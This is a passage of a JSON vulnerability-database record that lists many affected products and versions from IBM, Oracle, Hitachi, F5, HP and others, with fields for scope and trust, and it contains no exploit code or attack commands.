application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "retail allocation", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.0" }, { "model": "infosphere master data management collaborative edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-10.0" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.1-00" }, { "model": "qradar siem mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "device manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "device manager software", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "predictive insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "social media analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "device manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "tivoli integrated portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "global link manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-01" }, { "model": "retail allocation", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "device manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1.1-03" }, { "model": "tivoli workload scheduler z/os connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "application manager for smart business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "jdeveloper", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.3.5.0" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "device manager software (linux(rhel", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00-08" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "retail returns management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.0" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-11-01" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.0.3.0" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1.1-03(x64))" }, { "model": "retail back office 12.0.9in", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "device manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0-00" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "real-time decision platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "filenet content manager content engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-10" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00-07" }, { "model": "tiered storage manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "filenet p8 platform content search engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.05" }, { "model": "infosphere master data management collaborative edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-11.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.55" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "security qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "tivoli foundations for application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "infosphere master data management server for product information", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "retail returns management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.0" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.5" }, { "model": "waveset", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.1.1" }, { "model": "tivoli identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.4" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-11" }, { "model": "jdeveloper", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.24.0" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00-11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "tuning manager software", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.402" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.2.1-00" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.2.1-01" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.1-02" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "secure analytics 2012.1r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-03" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-00" }, { "model": "device manager software (solaris(op", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.4.0-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.0" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "insurance ifrs analyzer", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "178.0.7" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.11" }, { "model": "retail markdown optimization", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "secure analytics", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-00(x64))" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.33" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.17.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.24" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "websphere partner gateway express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.3" }, { "model": "tiered storage manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.1-02" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.4" }, { "model": "retail markdown optimization", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.0" }, { "model": "terasoluna server framework for java", "scope": "eq", "trust": 0.3, "vendor": "ntt data", "version": "2.0.51" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "tiered storage manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.01" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.0" }, { "model": "tuning manager software (linux(suse", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.0.1.0" }, { "model": "communications metasolv solution", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.10.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.0" }, { "model": "filenet p8 platform content search engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "raplication manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "retail returns management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.06" }, { "model": "portal", "scope": "eq", "trust": 0.3, "vendor": "liferay", "version": "6.2.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "xp7 global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.6.0-02" }, { "model": "secure analytics 2014.2r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.09" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.21" }, { "model": "raplication manager software (linux(suse", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "tivoli integrated portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.115" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "portal 6.2.1-ce-ga2-securit", "scope": null, "trust": 0.3, "vendor": "liferay", "version": null }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tiered storage manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.3.0-00" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.2" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.21.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "struts", "scope": "ne", "trust": 0.3, "vendor": "apache", "version": "2.3.16.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.4" }, { "model": "leads", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "device manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.0.2.0" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "security threat response manager 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.08" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "15.2" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.401" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "device manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0-00" }, { "model": "device manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "knowledge", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.6.1" }, { "model": "tiered storage manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.2" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "raplication manager software (solaris(x6", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "infosphere mashuphub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2-01" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.04" }, { "model": "device manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.0-00" }, { "model": "raplication manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "global link manager software (solaris(x6", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-01" }, { "model": "tivoli storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.3-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-11-07" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "device manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.0-06" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.22" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.5.0-02" }, { "model": "weblogic portal", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.3.6.0" }, { "model": "retail clearance optimization engine", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "sitescope monitors 11.32ip1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "tiered storage manager software (linux(rhel", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tuning manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.22" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "jdeveloper", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.17.0" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "tiered storage manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "tivoli composite application manager for application diagnostics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.0" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.4" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "retail returns management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "device manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "retail markdown optimization", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.0" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "xp p9000 tiered storage manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.6.1-06" }, { "model": "content analytics with enterprise search", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.3-00" }, { "model": "icewall configuration manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "enterprise data quality", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.0.11" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "16.1" }, { "model": "tivoli netcool/omnibus web gui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "device manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.1-02" }, { "model": "tiered storage manager software (linux(suse", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2-01" }, { "model": "xp7 global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.0-00" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.51" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7" }, { "model": "tuning manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "tiered storage manager software -00", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.1" }, { "model": "weblogic portal", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.2.1.0" }, { "model": "tiered storage manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "tivoli integrated portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-03(x64))" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "records manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00-03" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "tuning manager software (linux(rhel", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0-00(x64))" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-01" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, 